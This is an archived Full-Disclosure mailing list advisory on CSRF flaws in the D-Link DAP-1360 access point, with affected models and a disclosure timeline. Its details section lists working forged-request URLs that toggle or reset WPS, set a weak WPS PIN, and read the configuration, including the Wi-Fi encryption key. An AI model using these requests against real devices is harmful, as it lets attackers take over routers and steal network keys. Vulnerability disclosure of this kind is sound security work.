lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 30 Nov 2016 23:43:11 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] New CSRF vulnerabilities in D-Link DAP-1360

Hello list!

After previous Cross-Site Request Forgery and Cross-Site Scripting 
vulnerabilities, here are new ones. There are Cross-Site Request Forgery 
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model 
with other firmware versions also must be vulnerable.

D-Link should fix these vulnerabilities in the next version of firmware, as 
they answered me in October 2014.

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link should possibly fix the 
vulnerabilities in new firmware.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware possibly 
includes fixes for the vulnerabilities.

----------
Details:
----------

CSRF (WASC-09):

In section Wi-Fi - WPS it's possible to change parameter WPS Enable:

Turn on:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Turn off:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Reset to unconfigured:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

It's possible to read configuration in Information - Refresh. From this page 
it's possible to read data about Encryption key via XSS attack (it will work 
even at turned off WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

It's possible to change method in Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

------------
Timeline:
------------

2014.05.22 - informed developers about vulnerabilities in D-Link DAP-1360.
2014-2016 - informed developers about multiple vulnerabilities in this and 
other D-Link devices.
2016.01.27 - disclosed at my site (http://websecurity.com.ua/8120/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists